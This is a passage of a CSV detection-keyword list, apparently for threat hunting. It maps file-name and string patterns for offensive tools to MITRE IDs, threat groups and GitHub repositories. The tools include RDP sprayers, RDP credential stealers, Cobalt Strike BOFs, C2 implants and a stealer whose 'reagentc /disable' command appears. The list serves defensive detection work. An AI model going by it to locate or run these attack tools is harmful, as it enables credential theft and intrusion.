- Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","413","92","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" "*rdp_check.py*",".{0,1000}rdp_check\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*rdp_doublepulsar_rce.*",".{0,1000}rdp_doublepulsar_rce\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*rdp+kerberos-password://*?dc=*proxytype*proxyhost*",".{0,1000}rdp\+kerberos\-password\:\/\/.{0,1000}\?dc\=.{0,1000}proxytype.{0,1000}proxyhost.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*rdp+ntlm-password://*@*",".{0,1000}rdp\+ntlm\-password\:\/\/.{0,1000}\@.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*RDPassSpray.*.log*",".{0,1000}RDPassSpray\..{0,1000}\.log.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","10","7","613","239","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" "*RDPassSpray.csv*",".{0,1000}RDPassSpray\.csv.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","10","7","613","239","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" "*RDPassSpray.py*",".{0,1000}RDPassSpray\.py.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","10","7","613","239","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" "*RDPassSpray-main*",".{0,1000}RDPassSpray\-main.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","0","N/A","10","7","613","239","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" "*RDPassSpray-master*",".{0,1000}RDPassSpray\-master.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","10","7","613","239","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" "*rdpbrute.py*",".{0,1000}rdpbrute\.py.{0,1000}","offensive_tool_keyword","RedTeam_toolkit","Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/signorrayan/RedTeam_toolkit","1","1","N/A","N/A","6","512","113","2024-04-17T22:22:22Z","2021-08-18T08:58:14Z" "*RDP-Caching.ps1*",".{0,1000}RDP\-Caching\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*RDPCredentialStealer.zip*",".{0,1000}RDPCredentialStealer\.zip.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","3","222","35","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*RDPCredentialStealer-main*",".{0,1000}RDPCredentialStealer\-main.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","3","222","35","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*RDPCredsStealerDLL.*",".{0,1000}RDPCredsStealerDLL\..{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","3","222","35","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*RDPCredsStealerDLL.dll*",".{0,1000}RDPCredsStealerDLL\.dll.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","3","222","35","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*rdphijack.*",".{0,1000}rdphijack\..{0,1000}","offensive_tool_keyword","RDPHijack-BOF","BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","3","265","41","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" "*rdphijack.x64*",".{0,1000}rdphijack\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","10","3","265","41","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" "*rdphijack.x64.*",".{0,1000}rdphijack\.x64\..{0,1000}","offensive_tool_keyword","RDPHijack-BOF","BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","3","265","41","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" "*rdphijack.x86*",".{0,1000}rdphijack\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","10","3","265","41","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" "*rdphijack.x86.*",".{0,1000}rdphijack\.x86\..{0,1000}","offensive_tool_keyword","RDPHijack-BOF","BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","3","265","41","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" "*RDPHijack-BOF*",".{0,1000}RDPHijack\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","10","3","265","41","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" "*RDPHijack-BOF*",".{0,1000}RDPHijack\-BOF.{0,1000}","offensive_tool_keyword","RDPHijack-BOF","BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","3","265","41","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" "*RDPInception*",".{0,1000}RDPInception.{0,1000}","offensive_tool_keyword","RDPInception","A proof of concept for the RDP Inception Attack","T1188 - T1214 - T1555.003","TA0007 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mdsecactivebreach/RDPInception","1","1","N/A","N/A","4","342","327","2017-06-29T16:57:25Z","2017-06-29T10:08:23Z" "*RDPKeylog.exe*",".{0,1000}RDPKeylog\.exe.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*RDPReplayer.py*",".{0,1000}RDPReplayer\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*rdpscraper*",".{0,1000}rdpscraper.{0,1000}","offensive_tool_keyword","rdpscraper","rdpscraper - Enumerates users based off RDP Screenshots","T1110 - T1189 - T1056.001","TA0006 - TA0008 - TA0011","N/A","N/A","Information Gathering","https://github.com/x90skysn3k/rdpscraper","1","1","N/A","N/A","1","34","15","2023-10-25T21:17:52Z","2017-07-19T17:02:24Z" "*RDPSpray*",".{0,1000}RDPSpray.{0,1000}","offensive_tool_keyword","RDPSpray","Tool for password spraying RDP","T1110.001 - T1555.002","TA0006 - TA0040 - TA0003","N/A","N/A","Credential Access","https://github.com/dafthack/RDPSpray","1","1","N/A","N/A","1","91","40","2018-10-12T18:32:51Z","2018-10-12T18:29:52Z" "*RdpThief*",".{0,1000}RdpThief.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","1","N/A","10","10","1073","343","2019-11-13T14:13:52Z","2019-11-03T17:54:38Z" "*RdpThief.*",".{0,1000}RdpThief\..{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1408","219","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*rdrleakdiag.py*",".{0,1000}rdrleakdiag\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*read_cs_teamserver*",".{0,1000}read_cs_teamserver.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*readShellcode*",".{0,1000}readShellcode.{0,1000}","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","1","N/A","10","10","941","169","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" "*ReadyToPhish.xls*",".{0,1000}ReadyToPhish\.xls.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*reagentc /disable >nul*",".{0,1000}reagentc\s\/disable\s\>nul.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*RealBey/ThisIsNotRat*",".{0,1000}RealBey\/ThisIsNotRat.{0,1000}","offensive_tool_keyword","ThisIsNotRat","control windows computeur from telegram","T1098 - T1079 - T1105 - T1047 - T1059","TA0010 - TA0009 - TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RealBey/ThisIsNotRat","1","1","N/A","9","10","61","20","2023-09-10T07:39:38Z","2023-09-07T14:07:32Z" "*realgam3*",".{0,1000}realgam3.{0,1000}","offensive_tool_keyword","Github Username","github user Security Researcher @F5Networks hosting reverse tools and other pentester tools for data exfiltration and password attacks","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/realgam3","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Real-Passwords*",".{0,1000}Real\-Passwords.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8454","1605","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" "*Reaper.exe kp *",".{0,1000}Reaper\.exe\skp\s.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","2","112","31","2024-03-01T14:36:32Z","2023-09-21T02:09:48Z" "*Reaper.exe sp *",".{0,1000}Reaper\.exe\ssp\s.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","2","112","31","2024-03-01T14:36:32Z","2023-09-21T02:09:48Z" "*Reaper-main.zip*",".{0,1000}Reaper\-main\.zip.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","2","112","31","2024-03-01T14:36:32Z","2023-09-21T02:09:48Z" "*rebootuser/LinEnum*",".{0,1000}rebootuser\/LinEnum.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*REC2 implant for Mastodon*",".{0,1000}REC2\simplant\sfor\sMastodon.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*REC2 implant for VirusTotal*",".{0,1000}REC2\simplant\sfor\sVirusTotal.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*rec2::modules::rec2mastodon*",".{0,1000}rec2\:\:modules\:\:rec2mastodon.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*rec2_mastodon_x64.exe*",".{0,1000}rec2_mastodon_x64\.exe.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*rec2_virustotal_x64.exe*",".{0,1000}rec2_virustotal_x64\.exe.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*rec2mastodon.rs*",".{0,1000}rec2mastodon\.rs.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*rec2virustotal*",".{0,1000}rec2virustotal.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*rec2virustotal.rs*",".{0,1000}rec2virustotal\.rs.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*Receive a file via DoH*",".{0,1000}Receive\sa\sfile\svia\sDoH.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - 